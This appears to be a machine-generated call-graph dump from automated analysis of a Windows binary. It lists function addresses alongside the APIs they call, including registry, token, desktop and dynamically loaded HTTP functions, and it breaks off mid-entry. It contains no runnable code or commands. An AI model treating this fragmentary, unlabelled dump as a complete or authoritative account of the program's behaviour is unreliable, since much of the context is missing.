91502->91504 91505 11108f58 CloseHandle 91502->91505 91504->91505 91507 1109e9e0 91505->91507 91508 1109e9ef GetCurrentProcess OpenProcessToken 91507->91508 91509 1109ea2d 91507->91509 91508->91509 91510 1109ea12 91508->91510 91509->91451 91509->91452 92049 1109e910 91510->92049 91512 1109ea1b CloseHandle 91512->91509 91514 111450c1 GetVersionExA 91513->91514 91523 1114529c 91513->91523 91515 111450e3 91514->91515 91514->91523 91517 111450f0 RegOpenKeyExA 91515->91517 91515->91523 91516 111452a5 91518 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91516->91518 91519 1114511d _memset 91517->91519 91517->91523 91520 111452b2 91518->91520 92062 11143000 RegQueryValueExA 91519->92062 91520->91442 91521 11145304 91522 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91521->91522 91524 11145314 91522->91524 91523->91516 91523->91521 92073 11081c60 91523->92073 91524->91442 91528 11143000 std::_Mutex::_Mutex RegQueryValueExA 91530 11145189 91528->91530 91529 111452ec 91529->91516 91531 11162de7 std::_Mutex::_Mutex 79 API calls 91529->91531 91532 1114528f RegCloseKey 91530->91532 92064 11162de7 91530->92064 91533 111452fd 91531->91533 91532->91523 91533->91516 91533->91521 91537 111451ad 91538 111451c6 91537->91538 91539 11163a2d std::_Mutex::_Mutex 79 API calls 91537->91539 91540 11162de7 std::_Mutex::_Mutex 79 API calls 91538->91540 91539->91537 91542 111451d2 _strncpy 91540->91542 91541 11145271 91541->91532 91542->91541 91543 11143000 std::_Mutex::_Mutex RegQueryValueExA 91542->91543 91544 11145248 91543->91544 91545 11143000 std::_Mutex::_Mutex RegQueryValueExA 91544->91545 91545->91541 91546->91438 91547->91457 91548->91465 91550 11161d0b IsDebuggerPresent 91549->91550 91551 11161d09 91549->91551 92221 11177637 91550->92221 91551->91455 91554 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 91555 1116bcb6 __call_reportfault 91554->91555 91556 1116bcbe GetCurrentProcess TerminateProcess 91554->91556 91555->91556 91556->91455 91558 11162bce 91557->91558 91571 11162b5f 91557->91571 91581 1116d4a8 DecodePointer 91558->91581 91560 11162b6a 91560->91571 91575 1116d99d 66 API calls __NMSG_WRITE 91560->91575 91576 1116d7ee 66 API calls 6 library calls 91560->91576 91577 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 91560->91577 91561 11162bd4 91582 111692ef 66 API calls __getptd_noexit 91561->91582 91564 11162b8d RtlAllocateHeap 91564->91571 91573 1110f43e 91564->91573 91566 11162bba 91579 111692ef 66 API calls __getptd_noexit 91566->91579 91570 11162bb8 91580 111692ef 66 API calls __getptd_noexit 91570->91580 91571->91560 91571->91564 91571->91566 91571->91570 91578 1116d4a8 DecodePointer 91571->91578 91573->91472 91573->91475 91575->91560 91576->91560 91578->91571 91579->91570 91580->91573 91581->91561 91582->91573 91584 1110f536 CreateEventA 91583->91584 91585 1110f549 91583->91585 91584->91585 91586 1110f557 91585->91586 91592 1110f260 InterlockedIncrement 91585->91592 91588 111072cc 91586->91588 91593 1110f3c0 InterlockedIncrement 91586->91593 91588->91481 91590->91494 91591->91496 91592->91586 91593->91588 91691 11089280 91595->91691 91597 11102c5d 91598 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 91597->91598 91599 11102ccf GetLastError 91598->91599 91600 11102c8f SetThreadDesktop 91598->91600 91601 11146450 std::_Mutex::_Mutex 21 API calls 91599->91601 91602 11102cb1 GetLastError 91600->91602 91603 11102c9a 91600->91603 91605 11102ce1 91601->91605 91604 11146450 std::_Mutex::_Mutex 21 API calls 91602->91604 91702 11146450 91603->91702 91608 11102cc3 CloseDesktop 91604->91608 91696 11102bd0 91605->91696 91608->91605 91610 11102ceb 91708 1110f340 91610->91708 91612 11102cf2 91713 110f4740 16 API calls 91612->91713 91614 11102cf9 91714 1110f370 SetEvent PulseEvent 91614->91714 91616 11102d00 std::ios_base::_Tidy 91767 110b7a20 91617->91767 91619 1110fdee GetCurrentThreadId 91620 1110f340 266 API calls 91619->91620 91629 1110fe09 std::ios_base::_Tidy 91620->91629 91621 1110fe80 91771 1110f370 SetEvent PulseEvent 91621->91771 91623 1110fe20 WaitForSingleObject 91769 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 91623->91769 91624 1110fe8a 91626 1110fe43 91627 1110fe53 PostMessageA 91626->91627 91628 1110fe58 PostThreadMessageA 91626->91628 91627->91629 91628->91629 91629->91621 91629->91623 91629->91626 91770 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 91629->91770 91632 110272a2 91631->91632 91633 11089280 5 API calls 91632->91633 91634 110272a9 CreateEventA 91633->91634 91635 1110f420 std::_Mutex::_Mutex 265 API calls 91634->91635 91636 110272c6 91635->91636 91637 110272e7 91636->91637 91772 111100d0 91636->91772 91639 1110f340 266 API calls 91637->91639 91652 110272ff 91639->91652 91640 11027316 WaitForMultipleObjects 91641 1102732d 91640->91641 91640->91652 91642 11027336 PostMessageA 91641->91642 91643 1102734a SetEvent Sleep 91641->91643 91642->91643 91642->91652 91643->91652 91644 110273f4 91645 1102740e CloseHandle 91644->91645 91801 1110fc70 278 API calls 2 library calls 91644->91801 91802 1110f370 SetEvent PulseEvent 91645->91802 91646 11027375 PostMessageA 91646->91652 91650 11027405 std::ios_base::_Tidy 91650->91645 91651 11027423 91652->91640 91652->91644 91652->91646 91653 110273ba GetCurrentThreadId GetThreadDesktop 91652->91653 91800 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 91652->91800 91653->91652 91654 110273c9 SetThreadDesktop 91653->91654 91654->91652 91655 110273d4 CloseDesktop 91654->91655 91655->91652 91657 1102c442 91656->91657 91658 1110f340 266 API calls 91657->91658 91659 1102c44f WaitForSingleObject 91658->91659 91660 1102c466 91659->91660 91661 1102c67d 91659->91661 91662 1102c470 GetTickCount 91660->91662 91663 1102c666 WaitForSingleObject 91660->91663 91901 1110f370 SetEvent PulseEvent 91661->91901 91806 110d1550 91662->91806 91663->91660 91663->91661 91666 1102c684 CloseHandle 91902 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 91666->91902 91668 110d1550 268 API calls 91680 1102c486 91668->91680 91669 1102c695 std::ios_base::_Tidy 91671 1102c6b4 91903 11029450 265 API calls 2 library calls 91671->91903 91673 1102c6c8 91904 11029450 265 API calls 2 library calls 91673->91904 91675 1102c6dc 91905 11029450 265 API calls 2 library calls 91675->91905 91678 1102c6f0 91906 11029450 265 API calls 2 library calls 91678->91906 91679 1102c574 GetTickCount 91686 1102c571 std::ios_base::_Tidy 91679->91686 91680->91668 91680->91671 91680->91673 91680->91675 91680->91679 91816 110d0710 91680->91816 91828 11029590 LoadLibraryA 91680->91828 91881 110d1370 269 API calls 2 library calls 91680->91881 91684 11146450 std::_Mutex::_Mutex 21 API calls 91684->91686 91685 110d07c0 265 API calls 91685->91686 91686->91671 91686->91673 91686->91678 91686->91679 91686->91684 91686->91685 91690 110679c0 298 API calls 91686->91690 91882 11142290 91686->91882 91891 11042530 267 API calls 2 library calls 91686->91891 91892 110d07c0 91686->91892 91690->91686 91715 1110f6c0 91691->91715 91693 11089290 91694 110892b3 91693->91694 91695 110892a2 UnhookWindowsHookEx 91693->91695 91694->91597 91695->91694 91697 1110f420 std::_Mutex::_Mutex 265 API calls 91696->91697 91698 11102bfd 91697->91698 91699 11102c30 91698->91699 91721 11102ab0 91698->91721 91699->91610 91701 11102c1d 91701->91610 91703 11146461 91702->91703 91704 1114645c 91702->91704 91741 111458f0 91703->91741 91744 111456a0 18 API calls std::_Mutex::_Mutex 91704->91744 91709 1110f360 SetEvent 91708->91709 91710 1110f349 91708->91710 91709->91612 91766 11029450 265 API calls 2 library calls 91710->91766 91713->91614 91714->91616 91716 1110f6d7 EnterCriticalSection 91715->91716 91717 1110f6ce GetCurrentThreadId 91715->91717 91718 1110f6ee ___DllMainCRTStartup 91716->91718 91717->91716 91719 1110f6f5 LeaveCriticalSection 91718->91719 91720 1110f708 LeaveCriticalSection 91718->91720 91719->91693 91720->91693 91728 1115f550 91721->91728 91724 11102b81 CreateWindowExA 91724->91701 91725 11102b17 std::_Mutex::_Mutex 91726 11102b50 GetStockObject RegisterClassA 91725->91726 91726->91724 91727 11102b7a 91726->91727 91727->91724 91731 1115e380 GlobalAddAtomA 91728->91731 91732 1115e3b5 GetLastError wsprintfA 91731->91732 91733 1115e407 GlobalAddAtomA GlobalAddAtomA 91731->91733 91740 11029450 265 API calls 2 library calls 91732->91740 91734 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91733->91734 91737 11102ae1 GlobalAddAtomA 91734->91737 91737->91724 91737->91725 91745 111457a0 91741->91745 91743 11102ca5 CloseDesktop 91743->91605 91744->91703 91746 111457c4 91745->91746 91747 111457c9 91745->91747 91765 111456a0 18 API calls std::_Mutex::_Mutex 91746->91765 91749 11145832 91747->91749 91750 111457d2 91747->91750 91751 111458de 91749->91751 91752 1114583f wsprintfA 91749->91752 91753 11145809 91750->91753 91756 111457e0 91750->91756 91754 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91751->91754 91755 11145862 91752->91755 91759 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91753->91759 91757 111458ea 91754->91757 91755->91755 91758 11145869 wvsprintfA 91755->91758 91761 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 91756->91761 91757->91743 91764 11145884 91758->91764 91760 1114582e 91759->91760 91760->91743 91762 11145805 91761->91762 91762->91743 91763 111458d1 OutputDebugStringA 91763->91751 91764->91763 91764->91764 91765->91747 91768 110b7a28 std::_Mutex::_Mutex 91767->91768 91768->91619 91769->91629 91770->91629 91771->91624 91773 1110f420 std::_Mutex::_Mutex 265 API calls 91772->91773 91774 11110101 91773->91774 91775 11110123 GetCurrentThreadId InitializeCriticalSection 91774->91775 91776 1110f420 std::_Mutex::_Mutex 265 API calls 91774->91776 91779 11110190 EnterCriticalSection 91775->91779 91780 11110183 InitializeCriticalSection 91775->91780 91778 1111011c 91776->91778 91778->91775 91803 1116219a 66 API calls std::exception::_Copy_str 91778->91803 91781 1111024a LeaveCriticalSection 91779->91781 91782 111101be CreateEventA 91779->91782 91780->91779 91781->91637 91783 111101d1 91782->91783 91784 111101e8 91782->91784 91805 11029450 265 API calls 2 library calls 91783->91805 91787 1110f420 std::_Mutex::_Mutex 265 API calls 91784->91787 91790 111101ef 91787->91790 91788 1111013f 91804 111625f1 RaiseException 91788->91804 91792 1111020c 91790->91792 91793 111100d0 419 API calls 91790->91793 91794 1110f420 std::_Mutex::_Mutex 265 API calls 91792->91794 91793->91792 91795 1111021c 91794->91795 91796 1111022d 91795->91796 91797 1110f520 3 API calls 91795->91797 91798 1110f2b0 419 API calls 91796->91798 91797->91796 91799 11110245 91798->91799 91799->91781 91800->91652 91801->91650 91802->91651 91803->91788 91804->91775 91907 110d1480 91806->91907 91809 110d159b 91812 110d15b5 91809->91812 91813 110d1598 91809->91813 91810 110d1584 91921 11029450 265 API calls 2 library calls 91810->91921 91812->91680 91813->91809 91922 11029450 265 API calls 2 library calls 91813->91922 91817 110d0724 91816->91817 91980 11163cf8 91817->91980 91820 110d0450 265 API calls 91821 110d0753 91820->91821 91988 110cfe70 91821->91988 91824 110d077c 91824->91680 91825 110d0765 92000 11029450 265 API calls 2 library calls 91825->92000 91874 11029621 std::ios_base::_Tidy 91828->91874 91829 11029653 GetProcAddress 91832 11029671 SetLastError 91829->91832 91829->91874 91830 11029748 InternetOpenA 91830->91874 91831 1102972f GetProcAddress 91831->91830 91833 11029779 SetLastError 91831->91833 91832->91874 91833->91874 91834 110296a5 GetProcAddress 91835 11029762 SetLastError 91834->91835 91834->91874 91836 110296d2 GetLastError 91835->91836 91836->91874 91837 11142290 std::_Mutex::_Mutex 265 API calls 91837->91874 91838 11162be5 66 API calls _free 91838->91874 91839 110296f5 GetProcAddress 91840 1102976f SetLastError 91839->91840 91839->91874 91840->91874 91841 11029a40 91846 11029b76 GetProcAddress 91841->91846 91847 11029a31 91841->91847 91842 11162b51 66 API calls _malloc 91842->91874 91843 11029bb0 91843->91686 91844 11029ba9 FreeLibrary 91844->91843 91845 11029a57 GetProcAddress 91848 11029b2e SetLastError 91845->91848 91851 11029a1a std::ios_base::_Tidy 91845->91851 91846->91847 91849 11029b97 SetLastError 91846->91849 91847->91843 91847->91844 91871 11029b36 std::ios_base::_Tidy 91848->91871 91849->91847 91850 11081a70 IsDBCSLeadByte 91850->91874 91851->91841 91851->91845 91851->91847 91868 11029a88 std::ios_base::_Tidy 91851->91868 91851->91871 91853 11029b5b 92034 110278a0 GetProcAddress SetLastError 91853->92034 91856 110297ff GetProcAddress 91860 1102981c SetLastError 91856->91860 91856->91874 91857 1102982b GetProcAddress 91858 1102983e InternetConnectA 91857->91858 91862 11029881 SetLastError 91857->91862 91858->91874 91859 11029b6a 91859->91841 91860->91874 91862->91874 91863 11029864 GetProcAddress 91865 11029891 SetLastError 91863->91865 91863->91874 91864 110298a3 GetProcAddress 91866 110298d6 SetLastError 91864->91866 91864->91874 91865->91874 91866->91874 91867 110d1090 268 API calls 91867->91868 91868->91851 91868->91867 91868->91871 92025 1110f4a0 91868->92025 92032 11027850 GetProcAddress SetLastError 91868->92032 91869 110298f1 GetProcAddress 91870 1102990a HttpSendRequestA 91869->91870 91872 11029918 SetLastError 91869->91872 91873 11029922 GetLastError 91870->91873 92033 110278a0 GetProcAddress SetLastError 91871->92033 91872->91873 91873->91874 91875 1102993d GetProcAddress 91873->91875 91874->91829 91874->91830 91874->91831 91874->91834 91874->91836 91874->91837 91874->91838 91874->91839 91874->91842 91874->91850 91874->91851 91874->91856 91874->91857 91874->91858 91874->91863 91874->91864 91874->91869 91874->91870 91877 11029975 GetLastError 91874->91877 91878 1102998c GetDesktopWindow 91874->91878 91875->91874 91876 1102996d SetLastError 91875->91876 91876->91877 91877->91874 91877->91878 91878->91874 91879 1102999a GetProcAddress 91878->91879 91879->91874 91880 110299d6 SetLastError 91879->91880 91880->91874 91881->91680 91883 1114229a 91882->91883 91884 1114229c 91882->91884 91883->91686 91885 1110f4a0 std::_Mutex::_Mutex 265 API calls 91884->91885 91886 111422c2 91885->91886 91887 111422cb _strncpy 91886->91887 91888 111422e9 91886->91888 91887->91686 92036 11029450 265 API calls 2 library calls 91888->92036 91891->91686 92037 110d05c0 91892->92037 91895 110d07e9 92042 11162be5 91895->92042 91896 110d07d2 92041 11029450 265 API calls 2 library calls 91896->92041 91900 110d07f2 91900->91663 91901->91666 91902->91669 91908 110d148c 91907->91908 91909 110d14a7 91908->91909 91910 110d1490 91908->91910 91923 110d0190 91909->91923 91952 11029450 265 API calls 2 library calls 91910->91952 91917 110d14de 91917->91809 91917->91810 91918 110d14c7 91953 11029450 265 API calls 2 library calls 91918->91953 91924 110d0199 91923->91924 91925 110d019d 91924->91925 91926 110d01b4 91924->91926 91954 11029450 265 API calls 2 library calls 91925->91954 91928 110d01b1 91926->91928 91929 110d01e8 91926->91929 91928->91926 91955 11029450 265 API calls 2 library calls 91928->91955 91931 110d01e5 91929->91931 91932 110d0206 91929->91932 91931->91929 91956 11029450 265 API calls 2 library calls 91931->91956 91935 110d1090 91932->91935 91936 110d109e 91935->91936 91937 110d10b9 91936->91937 91938 110d10a2 91936->91938 91940 110d10ec 91937->91940 91942 110d10b6 91937->91942 91957 11029450 265 API calls 2 library calls 91938->91957 91941 110d1160 91940->91941 91959 110d09e0 91940->91959 91941->91917 91941->91918 91942->91937 91958 11029450 265 API calls 2 library calls 91942->91958 91948 110d111f _memmove 91948->91941 91949 110d1149 91948->91949 91971 11029450 265 API calls 2 library calls 91949->91971 91960 110d09ed 91959->91960 91961 110d0a08 91960->91961 91962 110d09f1 91960->91962 91964 110d0a05 91961->91964 91965 110d0a26 91961->91965 91977 11029450 265 API calls 2 library calls 91962->91977 91964->91961 91978 11029450 265 API calls 2 library calls 91964->91978 91972 110d0450 91965->91972 91970 110d0920 268 API calls 2 library calls 91970->91948 91973 110d045b 91972->91973 91974 110d0472 91972->91974 91979 11029450 265 API calls 2 library calls 91973->91979 91974->91948 91974->91970 91981 11163d09 _strlen 91980->91981 91982 110d072f 91980->91982 91983 11162b51 _malloc 66 API calls 91981->91983 91982->91820 91984 11163d1c 91983->91984 91984->91982 92001 1116be9f 91984->92001 91989 110cfe7d 91988->91989 91990 110cfe98 91989->91990 91991 110cfe81 91989->91991 91993 110cfe95 91990->91993 91994 110cfeb6 91990->91994 92022 11029450 265 API calls 2 library calls 91991->92022 91993->91990 92023 11029450 265 API calls 2 library calls 91993->92023 91996 110cfeb3 91994->91996 91997 110cfed9 91994->91997 91996->91994 92024 11029450 265 API calls 2 library calls 91996->92024 91997->91824 91997->91825 92002 1116beb4 92001->92002 92003 1116bead 92001->92003 92013 111692ef 66 API calls __getptd_noexit 92002->92013 92003->92002 92008 1116bed2 92003->92008 92005 1116beb9 92014 1116df04 11 API calls _xtoa_s@20 92005->92014 92007 11163d2e 92007->91982 92010 1116deb2 92007->92010 92008->92007 92015 111692ef 66 API calls __getptd_noexit 92008->92015 92016 1116dd89 92010->92016 92013->92005 92014->92007 92015->92005 92017 1116dda8 _memset __call_reportfault 92016->92017 92018 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 92017->92018 92019 1116de94 __call_reportfault 92018->92019 92020 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92019->92020 92021 1116deb0 GetCurrentProcess TerminateProcess 92020->92021 92021->91982 92026 11162b51 _malloc 66 API calls 92025->92026 92027 1110f4ae 92026->92027 92028 1110f4b7 92027->92028 92029 1110f4ce _memset 92027->92029 92035 11029450 265 API calls 2 library calls 92028->92035 92029->91868 92032->91868 92033->91853 92034->91859 92038 110d05d9 92037->92038 92039 110d05ec 92037->92039 92038->92039 92040 110d0450 265 API calls 92038->92040 92039->91895 92039->91896 92040->92039 92043 11162bf0 HeapFree 92042->92043 92044 11162c19 __dosmaperr 92042->92044 92043->92044 92045 11162c05 92043->92045 92044->91900 92048 111692ef 66 API calls __getptd_noexit 92045->92048 92047 11162c0b GetLastError 92047->92044 92048->92047 92050 1109e9c6 92049->92050 92051 1109e930 GetTokenInformation 92049->92051 92052 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92050->92052 92053 1109e952 _strupr_s_l_stat 92051->92053 92054 1109e9d8 92052->92054 92053->92050 92055 1109e958 GetTokenInformation 92053->92055 92054->91512 92055->92050 92056 1109e96a 92055->92056 92057 1109e99f EqualSid 92056->92057 92058 1109e973 AllocateAndInitializeSid 92056->92058 92057->92050 92059 1109e9ad 92057->92059 92058->92050 92058->92057 92060 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92059->92060 92061 1109e9c2 92060->92061 92061->91512 92063 1114302a 92062->92063 92063->91528 92065 11162dd1 92064->92065 92083 1116364b 92065->92083 92068 11163a2d 92069 11163a4d 92068->92069 92070 11163a3b 92068->92070 92218 111639dc 79 API calls 2 library calls 92069->92218 92070->91537 92072 11163a57 92072->91537 92074 11081c6d 92073->92074 92075 11081c72 92073->92075 92219 11081990 IsDBCSLeadByte 92074->92219 92077 11081c7b 92075->92077 92082 11081c93 92075->92082 92220 11163784 85 API calls 2 library calls 92077->92220 92079 11081c99 92079->91529 92080 11081c8c 92080->91529 92081 11165797 85 API calls std::_Mutex::_Mutex 92081->92082 92082->92079 92082->92081 92084 11163664 92083->92084 92087 11163420 92084->92087 92099 11163399 92087->92099 92089 11163444 92107 111692ef 66 API calls __getptd_noexit 92089->92107 92092 11163449 92108 1116df04 11 API calls _xtoa_s@20 92092->92108 92095 1116347a 92098 111634c1 92095->92098 92109 11170c05 79 API calls 3 library calls 92095->92109 92096 1114519e 92096->92068 92098->92096 92110 111692ef 66 API calls __getptd_noexit 92098->92110 92100 111633ac 92099->92100 92106 111633f9 92099->92106 92111 1116b7b5 92100->92111 92103 111633d9 92103->92106 92131 11170744 68 API calls 6 library calls 92103->92131 92106->92089 92106->92095 92107->92092 92108->92096 92109->92095 92110->92096 92132 1116b73c GetLastError 92111->92132 92113 1116b7bd 92114 111633b1 92113->92114 92146 1116d7aa 66 API calls 3 library calls 92113->92146 92114->92103 92116 111704a8 92114->92116 92117 111704b4 _doexit 92116->92117 92118 1116b7b5 __getptd 66 API calls 92117->92118 92119 111704b9 92118->92119 92120 111704e7 92119->92120 92121 111704cb 92119->92121 92169 1117373c 92120->92169 92123 1116b7b5 __getptd 66 API calls 92121->92123 92126 111704d0 92123->92126 92124 111704ee 92176 1117045b 74 API calls 3 library calls 92124->92176 92129 111704de _doexit 92126->92129 92168 1116d7aa 66 API calls 3 library calls 92126->92168 92127 11170502 92177 11170515 LeaveCriticalSection _doexit 92127->92177 92129->92103 92131->92106 92147 1116b5fa TlsGetValue 92132->92147 92135 1116b7a9 SetLastError 92135->92113 92138 1116b76f DecodePointer 92139 1116b784 92138->92139 92140 1116b7a0 92139->92140 92141 1116b788 92139->92141 92143 11162be5 _free 62 API calls 92140->92143 92156 1116b688 66 API calls 4 library calls 92141->92156 92145 1116b7a6 92143->92145 92144 1116b790 GetCurrentThreadId 92144->92135 92145->92135 92148 1116b60f DecodePointer TlsSetValue 92147->92148 92149 1116b62a 92147->92149 92148->92149 92149->92135 92150 11169dbe 92149->92150 92153 11169dc7 92150->92153 92152 11169e04 92152->92135 92152->92138 92153->92152 92154 11169de5 Sleep 92153->92154 92157 11170166 92153->92157 92155 11169dfa 92154->92155 92155->92152 92155->92153 92156->92144 92158 11170172 92157->92158 92162 1117018d 92157->92162 92159 1117017e 92158->92159 92158->92162 92166 111692ef 66 API calls __getptd_noexit 92159->92166 92160 111701a0 RtlAllocateHeap 92160->92162 92165 111701c7 92160->92165 92162->92160 92162->92165 92167 1116d4a8 DecodePointer 92162->92167 92163 11170183 92163->92153 92165->92153 92166->92163 92167->92162 92170 11173764 EnterCriticalSection 92169->92170 92171 11173751 92169->92171 92170->92124 92178 1117367a 92171->92178 92173 11173757 92173->92170 92205 1116d7aa 66 API calls 3 library calls 92173->92205 92176->92127 92177->92126 92179 11173686 _doexit 92178->92179 92180 11173696 92179->92180 92181 111736ae 92179->92181 92206 1116d99d 66 API calls __NMSG_WRITE 92180->92206 92190 111736bc _doexit 92181->92190 92209 11169d79 92181->92209 92183 1117369b 92207 1116d7ee 66 API calls 6 library calls 92183->92207 92187 111736a2 92208 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 92187->92208 92188 111736ce 92215 111692ef 66 API calls __getptd_noexit 92188->92215 92189 111736dd 92193 1117373c __lock 65 API calls 92189->92193 92190->92173 92195 111736e4 92193->92195 92196 11173717 92195->92196 92197 111736ec InitializeCriticalSectionAndSpinCount 92195->92197 92200 11162be5 _free 65 API calls 92196->92200 92198 11173708 92197->92198 92199 111736fc 92197->92199 92217 11173733 LeaveCriticalSection _doexit 92198->92217 92201 11162be5 _free 65 API calls 92199->92201 92200->92198 92202 11173702 92201->92202 92216 111692ef 66 API calls __getptd_noexit 92202->92216 92206->92183 92207->92187 92211 11169d82 92209->92211 92210 11162b51 _malloc 65 API calls 92210->92211 92211->92210 92212 11169db8 92211->92212 92213 11169d99 Sleep 92211->92213 92212->92188 92212->92189 92214 11169dae 92213->92214 92214->92211 92214->92212 92215->92190 92216->92198 92217->92190 92218->92072 92219->92075 92220->92080 92221->91554 92222 11115b70 92240 11145320 92222->92240 92225 11115bb5 92226 11115b98 92225->92226 92227 11115bc4 CoInitialize CoCreateInstance 92225->92227 92228 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92226->92228 92230 11115bf4 LoadLibraryA 92227->92230 92231 11115be9 92227->92231 92233 11115ba6 92228->92233 92229 111450a0 std::_Mutex::_Mutex 90 API calls 92229->92225 92230->92231 92232 11115c10 GetProcAddress 92230->92232 92236 11115cd1 CoUninitialize 92231->92236 92237 11115cd7 92231->92237 92234 11115c20 SHGetSettings 92232->92234 92235 11115c34 FreeLibrary 92232->92235 92234->92235 92235->92231 92236->92237 92238 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92237->92238 92239 11115ce6 92238->92239 92241 111450a0 std::_Mutex::_Mutex 90 API calls 92240->92241 92242 11115b8e 92241->92242 92242->92225 92242->92226 92242->92229 92243 11173a35 92244 1116b7b5 __getptd 66 API calls 92243->92244 92245 11173a52 _LcidFromHexString 92244->92245 92246 11173a5f GetLocaleInfoA 92245->92246 92247 11173a92 92246->92247 92255 11173a86 92246->92255 92266 111646ce 85 API calls 2 library calls 92247->92266 92249 11161d01 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 92251 11173c02 92249->92251 92250 11173a9e 92252 11173aa8 GetLocaleInfoA 92250->92252 92263 11173ad8 _CountryEnumProc@4 _strlen 92250->92263 92253 11173ac7 92252->92253 92252->92255 92267 111646ce 85 API calls 2 library calls 92253->92267 92254 11173b4b GetLocaleInfoA 92254->92255 92257 11173b6e 92254->92257 92255->92249 92269 111646ce 85 API calls 2 library calls 92257->92269 92259 11173ad2 92259->92263 92268 11163784 85 API calls 2 library calls 92259->92268 92260 11173b79 92260->92255 92264 11173b81 _strlen 92260->92264 92270 111646ce 85 API calls 2 library calls 92260->92270 92263->92254 92263->92255 92264->92255 92271 111739da GetLocaleInfoW _GetPrimaryLen _strlen 92264->92271 92266->92250 92267->92259 92268->92263 92269->92260 92270->92264 92271->92255 92272 1102e640 92273 1102e683 92272->92273 92274 1110f420 std::_Mutex::_Mutex 265 API calls 92273->92274 92275 1102e68a 92274->92275 92277 1102e6aa 92275->92277 93342 11142a60 92275->93342 92671 11142bb0 92277->92671 92280 1102e701 92283 11142bb0 86 API calls 92280->92283 92282 1102e6e6 92284 11081bb0 86 API calls 92282->92284 92285 1102e72a 92283->92285 92284->92280 92286 11162de7 std::_Mutex::_Mutex 79 API calls 92285->92286 92290 1102e737 92285->92290 92286->92290 92287 1102e766 92288 1102e7e5 CreateEventA 92287->92288 92289 1102e7bf GetSystemMetrics 92287->92289 92296 1102e805 92288->92296 92297 1102e819 92288->92297 92289->92288 92291 1102e7ce 92289->92291 92290->92287 92293 111450a0 std::_Mutex::_Mutex 90 API calls 92290->92293 92294 11146450 std::_Mutex::_Mutex 21 API calls 92291->92294 92293->92287 92295 1102e7d8 92294->92295 93360 1102d330 92295->93360 93504 11029450 265 API calls 2 library calls 92296->93504 92300 1110f420 std::_Mutex::_Mutex 265 API calls 92297->92300 92301 1102e820 92300->92301 92302 1102e840 92301->92302 92303 111100d0 425 API calls 92301->92303 92304 1110f420 std::_Mutex::_Mutex 265 API calls 92302->92304 92303->92302 92305 1102e854 92304->92305 92306 111100d0 425 API calls 92305->92306 92307 1102e874 92305->92307 92306->92307 92308 1110f420 std::_Mutex::_Mutex 265 API calls 92307->92308 92309 1102e8f3 92308->92309 92310 1102e923 92309->92310 93505 11060f70 301 API calls std::_Mutex::_Mutex 92309->93505 92312 1110f420 std::_Mutex::_Mutex 265 API calls 92310->92312 92313 1102e93d 92312->92313 92314 1102e962 FindWindowA 92313->92314 93506 11060be0 293 API calls std::_Mutex::_Mutex 92313->93506 92317 1102eab7 92314->92317 92318 1102e99b 92314->92318 92677 110613d0 92317->92677 92318->92317 92322 1102e9b3 GetWindowThreadProcessId 92318->92322 92321 110613d0 268 API calls 92323 1102ead5 92321->92323 92324 11146450 std::_Mutex::_Mutex 21 API calls 92322->92324 92325 110613d0 268 API calls 92323->92325 92326 1102e9d9 OpenProcess 92324->92326 92328 1102eae1 92325->92328 92326->92317 92327 1102e9f9 92326->92327 93507 11094b30 105 API calls 92327->93507 92330 1102eaf8 92328->92330 92331 1102eaef 92328->92331 92684 11145910 92330->92684 93508 11027d60 119 API calls 2 library calls 92331->93508 92332 1102ea18 92334 11146450 std::_Mutex::_Mutex 21 API calls 92332->92334 92337 1102ea2c 92334->92337 92335 1102eaf4 92335->92330 92339 1102ea6b CloseHandle FindWindowA 92337->92339 92341 11146450 std::_Mutex::_Mutex 21 API calls 92337->92341 92338 1102eb07 92699 11144dc0 ExpandEnvironmentStringsA 92338->92699 92342 1102ea93 GetWindowThreadProcessId 92339->92342 92343 1102eaa7 92339->92343 92345 1102ea3e SendMessageA WaitForSingleObject 92341->92345 92342->92343 92346 11146450 std::_Mutex::_Mutex 21 API calls 92343->92346 92345->92339 92348 1102ea5e 92345->92348 92349 1102eab4 92346->92349 92351 11146450 std::_Mutex::_Mutex 21 API calls 92348->92351 92349->92317 92350 1102eb2a 92352 1102ec01 92350->92352 92723 11062d60 92350->92723 92353 1102ea68 92351->92353 92738 110274c0 92352->92738 92353->92339 93569 11142ac0 92671->93569 92673 11142ac0 IsDBCSLeadByte 92675 11142bc5 92673->92675 92674 11165797 85 API calls std::_Mutex::_Mutex 92674->92675 92675->92673 92675->92674 92676 